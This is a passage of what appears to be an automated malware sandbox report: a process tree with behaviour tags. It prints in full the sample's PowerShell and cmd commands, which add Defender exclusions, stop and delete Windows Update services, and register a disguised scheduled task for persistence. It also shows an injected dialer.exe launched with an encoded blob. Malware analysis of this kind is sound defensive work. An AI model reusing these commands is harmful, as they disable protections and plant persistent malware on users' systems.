- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 2803⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe ovyftblehadxh2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1556 -ip 15562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 4204 -ip 42042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 3284 -ip 32842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 2712 -ip 27122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3508 -ip 35082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 1180 -ip 11802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 3984 -ip 39842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 2036 -ip 20362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 808 -ip 8082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 400 -p 4336 -ip 43362⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2224 -ip 22242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1924 -ip 19242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 400 -p 2884 -ip 28842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 3468 -ip 34682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 3144 -ip 31442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 1184 -ip 11842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 4292 -ip 42922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 916 -ip 9162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 4320 -ip 43202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 2196 -ip 21962⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 2320 -ip 23202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 3388 -ip 33882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1164 -ip 11642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 3468 -ip 34682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 1556 -ip 15562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 4020 -ip 40202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3128 -ip 31282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 3328 -ip 33282⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 1384 -ip 13842⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 4576 -ip 45762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 1508 -ip 15082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 544 -p 4068 -ip 40682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 4392 -ip 43922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 3196 -ip 31962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3688 -ip 36882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 444 -ip 4442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 4380 -ip 43802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 1764 -ip 17642⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2712 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3508 -s 3882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1180 -s 4122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3984 -s 4682⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2036 -s 3122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 808 -s 3521⤵
- Program crash
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4336 -s 6562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1924 -s 6802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2224 -s 4601⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2884 -s 6482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3468 -s 2321⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
